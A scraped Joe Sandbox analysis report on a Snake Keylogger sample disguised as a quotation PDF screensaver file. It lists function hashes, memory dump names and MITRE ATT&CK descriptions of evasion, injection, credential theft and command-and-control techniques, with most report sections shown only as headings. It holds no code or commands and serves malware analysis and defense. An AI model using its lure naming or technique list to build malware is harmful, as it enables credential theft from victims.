Function 00007FFD9B8A0F3D Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2956339672.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8a0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 955d00976b5157a72996f8682d38d29e5b7ed34157551a7820ab7a7b5e14a1df
Instruction ID: d337219be1b8b69ccdb2d8a6d476a00339a59a7a5dbf2bdb7481b42b4bf59e78
Opcode Fuzzy Hash: 955d00976b5157a72996f8682d38d29e5b7ed34157551a7820ab7a7b5e14a1df
Instruction Fuzzy Hash: 94D012B050594A5FD392EBA88C187A57BD1AF1E304F0500FD8408CB293CE284C888780

Function 00007FFD9B8A51FA Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2956339672.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b8a0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86e1bd15709ca74129d4359147cb37ef0cc0cb62c8b16e254296c6f3c3d0255b
Instruction ID: 74d708b0178580f351fa2999bbfeec1e7c8714c6ac7f48d56733e3af4db2a306
Opcode Fuzzy Hash: 86e1bd15709ca74129d4359147cb37ef0cc0cb62c8b16e254296c6f3c3d0255b
Instruction Fuzzy Hash: 33A0220FB0C22020A20830CEB2028CC8308CAC23FB0208033E30EC00832C00200A02A8

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre